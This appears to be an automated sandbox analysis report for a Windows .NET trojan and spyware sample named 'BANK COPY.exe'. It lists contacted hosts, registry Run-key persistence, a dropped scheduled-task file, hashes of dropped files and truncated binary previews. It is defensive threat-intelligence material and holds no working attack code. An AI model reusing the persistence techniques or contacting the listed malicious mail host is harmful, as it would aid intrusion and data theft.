                                  http://www.sakkal.comBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com.TTFBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.comueedBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/deBANK COPY.exe, 00000000.00000003.250261634.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.251054745.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250645734.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.251128359.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250676479.0000000005B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.comBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.comFBANK COPY.exe, 00000000.00000003.249576412.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.249860644.0000000005B6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.comouynBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.agfamonotype.BANK COPY.exe, 00000000.00000003.254135945.0000000005B75000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sajatypeworks.comsBANK COPY.exe, 00000000.00000003.242051970.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242330356.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242361494.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242252206.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241973593.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241943884.0000000005B7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwRegSvcs.exe, 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deFBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fonts.com-uHBANK COPY.exe, 00000000.00000003.242276187.0000000005B84000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fonts.comYBANK COPY.exe, 00000000.00000003.242308012.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.comlBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cn/BANK COPY.exe, 00000000.00000003.245237254.0000000005B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cnBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.245247770.0000000005B69000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.245400300.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.244727394.0000000005B9D000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.245237254.0000000005B64000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.244817743.0000000005B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlBANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers/cabarga.htmlBANK COPY.exe, 00000000.00000003.250092163.0000000005B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fonts.comcYBANK COPY.exe, 00000000.00000003.242234514.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.monotype.BANK COPY.exe, 00000000.00000003.253812232.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.253923382.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.253743728.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.253982107.0000000005B6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.tiro.comPBANK COPY.exe, 00000000.00000003.242764767.0000000005B7B000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242745354.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.tiro.comkBANK COPY.exe, 00000000.00000003.242764767.0000000005B7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8BANK COPY.exe, 00000000.00000002.297706220.0000000006D72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.comituBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sajatypeworks.coma-dtBANK COPY.exe, 00000000.00000003.242005445.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241973593.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.242028008.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, BANK COPY.exe, 00000000.00000003.241943884.0000000005B7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.comalsFnyBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.urwpp.decBANK COPY.exe, 00000000.00000003.250549697.0000000005B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                162.241.217.198
                                                mail.absheron-sharab.azUnited States
                                                46606UNIFIEDLAYER-AS-1USfalse
                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680551
                                                Start date and time: 08/08/202219:54:082022-08-08 19:54:08 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 41s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:BANK COPY.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:32
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 107
                                                • Number of non-executed functions: 21
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, fs.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                TimeTypeDescription
                                                19:55:16API Interceptor1x Sleep call for process: BANK COPY.exe modified
                                                19:55:29API Interceptor662x Sleep call for process: RegSvcs.exe modified
                                                19:55:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                19:55:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                162.241.217.198INVOICE.exeGet hashmaliciousBrowse
                                                  DEBIT NOTE for JUNEJULY 2022.exeGet hashmaliciousBrowse
                                                    SWIFT COPY.exeGet hashmaliciousBrowse
                                                      PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                        UPDATED SOA.exeGet hashmaliciousBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          mail.absheron-sharab.azBANK COPY.exeGet hashmaliciousBrowse
                                                          • 162.241.217.198
                                                          INVOICE.exeGet hashmaliciousBrowse
                                                          • 162.241.217.198
                                                          DEBIT NOTE for JUNEJULY 2022.exeGet hashmaliciousBrowse
                                                          • 162.241.217.198
                                                          SWIFT COPY.exeGet hashmaliciousBrowse
                                                          • 162.241.217.198
                                                          PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                          • 162.241.217.198
                                                          UPDATED SOA.exeGet hashmaliciousBrowse
                                                          • 162.241.217.198
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          UNIFIEDLAYER-AS-1UShttp://okaloosaclerk.loyaltyhn.com/#.aHR0cDovL2Z1ZWd1aWxsb3MuY2wvd3AtaW5jbHVkZXMvaW1hZ2VzL3NtaWxpZXMvenovP2U9dHdpbGNveEBva2Fsb29zYWNsZXJrLmNvbQ==Get hashmaliciousBrowse
                                                          • 50.87.153.169
                                                          QBORemittance_Danellarealty#007-Intuit.htmlGet hashmaliciousBrowse
                                                          • 69.49.246.164
                                                          vbc.exeGet hashmaliciousBrowse
                                                          • 108.167.169.56
                                                          PAYMENT-ADVICE.exeGet hashmaliciousBrowse
                                                          • 50.87.144.250
                                                          SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeGet hashmaliciousBrowse
                                                          • 162.240.35.239
                                                          Inquiry Order Q330284.exeGet hashmaliciousBrowse
                                                          • 162.144.73.161
                                                          B1kefW3SOZGet hashmaliciousBrowse
                                                          • 173.83.45.198
                                                          Custom Release Form(E) AWB 825.pdf.exeGet hashmaliciousBrowse
                                                          • 192.185.174.178
                                                          aYlPjjl4yWGet hashmaliciousBrowse
                                                          • 66.116.195.121
                                                          Custom Release Form (E) AWB 825.pdf.exeGet hashmaliciousBrowse
                                                          • 192.185.174.178
                                                          STS5492338072022.xlsxGet hashmaliciousBrowse
                                                          • 192.185.174.177
                                                          SecuriteInfo.com.Trojan.MSIL.AgentTesla.MY.MTB.26387.exeGet hashmaliciousBrowse
                                                          • 192.185.174.177
                                                          SWIFT_5201660828948016.pdf.exeGet hashmaliciousBrowse
                                                          • 192.185.174.177
                                                          fake.htmlGet hashmaliciousBrowse
                                                          • 69.49.246.164
                                                          https://geni.us/SecureCaliberfileGet hashmaliciousBrowse
                                                          • 192.185.28.38
                                                          https://adclick.g.doubleclick.net/pcs/click?adurl=https://550418.secure.micomya.com/./outlook.office.com/mail/inbox/id/thall/op-f/77468616c6c406f702d662e6f7267#dGhhbGxAb3AtZi5vcmcGet hashmaliciousBrowse
                                                          • 162.215.222.33
                                                          Universalmiddel169.exeGet hashmaliciousBrowse
                                                          • 173.254.30.236
                                                          https://venkeywonder.com/gtrsfauvc/xwazutdrs/yxwaertfs/oglvjh0jkhjh/traciparker@smartcabinetry.comGet hashmaliciousBrowse
                                                          • 192.185.181.244
                                                          SWIFT_5201660828948056.pdf.exeGet hashmaliciousBrowse
                                                          • 192.185.174.177
                                                          Shipping Document.exeGet hashmaliciousBrowse
                                                          • 192.185.16.184
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exenew artwork.exeGet hashmaliciousBrowse
                                                            new artwork.exeGet hashmaliciousBrowse
                                                              Processed payment.exeGet hashmaliciousBrowse
                                                                BANK COPY.exeGet hashmaliciousBrowse
                                                                  PO CPWPKL-1901088.exeGet hashmaliciousBrowse
                                                                    UPDATED SOA.exeGet hashmaliciousBrowse
                                                                      Ordem de Compra pdf QD2y.exeGet hashmaliciousBrowse
                                                                        INVOICE.exeGet hashmaliciousBrowse
                                                                          xox.exeGet hashmaliciousBrowse
                                                                            payment.exeGet hashmaliciousBrowse
                                                                              payment.exeGet hashmaliciousBrowse
                                                                                REMINDER 1.exeGet hashmaliciousBrowse
                                                                                  Offer for sale.exeGet hashmaliciousBrowse
                                                                                    purchase order.exeGet hashmaliciousBrowse
                                                                                      Offer for sale.exeGet hashmaliciousBrowse
                                                                                        svbhjvUpxT.exeGet hashmaliciousBrowse
                                                                                          SHIPMENT DOCUMENT.exeGet hashmaliciousBrowse
                                                                                            g0t8s6FogF.exeGet hashmaliciousBrowse
                                                                                              QUATION.exeGet hashmaliciousBrowse
                                                                                                PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                                  Process:C:\Users\user\Desktop\BANK COPY.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1216
                                                                                                  Entropy (8bit):5.355304211458859
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                                  Malicious:true
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                  Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):142
                                                                                                  Entropy (8bit):5.090621108356562
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                                                  MD5:8C0458BB9EA02D50565175E38D577E35
                                                                                                  SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                                                  SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                                                  SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                                                  Malicious:false
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                  Process:C:\Users\user\Desktop\BANK COPY.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1641
                                                                                                  Entropy (8bit):5.184328660661114
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBDYtn:cbh47TlNQ//rydbz9I3YODOLNdq3s
                                                                                                  MD5:86B04371CA462A6BE046C3EAA9671823
                                                                                                  SHA1:3E8E41B4250A4563ED07C9F8AF74B78345B4F257
                                                                                                  SHA-256:2D37DC322D4039166A732F08E8FE4B62C7D48A1B5274FF222D9371D94E247170
                                                                                                  SHA-512:39102335C05F2D7B6892DD425B8A42B1A9ABE5A062F5B7F1799476BE1D1CA0665679C350E555B18DB823FA79E386F1348DE93C560CA76AFFEEC03429C3DF861B
                                                                                                  Malicious:true
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                                  Process:C:\Users\user\Desktop\BANK COPY.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):798208
                                                                                                  Entropy (8bit):7.742343453025608
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:1lEsuE02iN2UP3L/2+vCU48RXnnYph89YSrHp1S+tzTyy+dT9Z25MqT:4V18UfL5vO8R3YpuYSrHLSozTyJ9Zk
                                                                                                  MD5:0197C423EDDEB8A0ED293E96A152F5A2
                                                                                                  SHA1:068261F9991202B0A75D813F0C25267D28E4FB51
                                                                                                  SHA-256:54877CF2E0D27D13A5E94FCFB0EAE5749BFC56E0E2F548F6410E6E4D56F3EA3F
                                                                                                  SHA-512:8223327EE59D6B93CE6CA2B916DC1583857A66BDF1B4777BD6855C46C3E27563F260CF89138128E7DF60286867CCC39E92734DF82D89C0659D835E30F2192C05
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..b..............P......$......z&... ...@....@.. ....................................@.................................(&..O....@..D ........................................................................... ............... ..H............text........ ...................... ..`.rsrc...D ...@..."..................@..@.reloc...............,..............@..B................\&......H.......8~..XH..............._............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0..<........~.....(,.....,!r...p.....(-...o....s/............~.....+..*.0...........~.....+..*".......*.0..&........(....r5..p~....o0...(1.....t$....+..*...0..&........(....rC..p~....o0...(1.....
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):45152
                                                                                                  Entropy (8bit):6.149629800481177
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                                                                  MD5:2867A3817C9245F7CF518524DFD18F28
                                                                                                  SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                                                                  SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                                                                  SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: new artwork.exe, Detection: malicious, Browse
                                                                                                  • Filename: new artwork.exe, Detection: malicious, Browse
                                                                                                  • Filename: Processed payment.exe, Detection: malicious, Browse
                                                                                                  • Filename: BANK COPY.exe, Detection: malicious, Browse
                                                                                                  • Filename: PO CPWPKL-1901088.exe, Detection: malicious, Browse
                                                                                                  • Filename: UPDATED SOA.exe, Detection: malicious, Browse
                                                                                                  • Filename: Ordem de Compra pdf QD2y.exe, Detection: malicious, Browse
                                                                                                  • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                                  • Filename: xox.exe, Detection: malicious, Browse
                                                                                                  • Filename: payment.exe, Detection: malicious, Browse
                                                                                                  • Filename: payment.exe, Detection: malicious, Browse
                                                                                                  • Filename: REMINDER 1.exe, Detection: malicious, Browse
                                                                                                  • Filename: Offer for sale.exe, Detection: malicious, Browse
                                                                                                  • Filename: purchase order.exe, Detection: malicious, Browse
                                                                                                  • Filename: Offer for sale.exe, Detection: malicious, Browse
                                                                                                  • Filename: svbhjvUpxT.exe, Detection: malicious, Browse
                                                                                                  • Filename: SHIPMENT DOCUMENT.exe, Detection: malicious, Browse
                                                                                                  • Filename: g0t8s6FogF.exe, Detection: malicious, Browse
                                                                                                  • Filename: QUATION.exe, Detection: malicious, Browse
                                                                                                  • Filename: PAYMENT COPY.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):835
                                                                                                  Entropy (8bit):4.694294591169137
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                                                                  MD5:6EB47C1CF858E25486E42440074917F2
                                                                                                  SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                                                                  SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                                                                  SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                                                                  Malicious:true
                                                                                                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
                                                                                                  Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1141
                                                                                                  Entropy (8bit):4.44831826838854
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                                                                  MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                                                                  SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                                                                  SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                                                                  SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                                                                  Malicious:false
                                                                                                  Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.742343453025608
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:BANK COPY.exe
                                                                                                  File size:798208
                                                                                                  MD5:0197c423eddeb8a0ed293e96a152f5a2
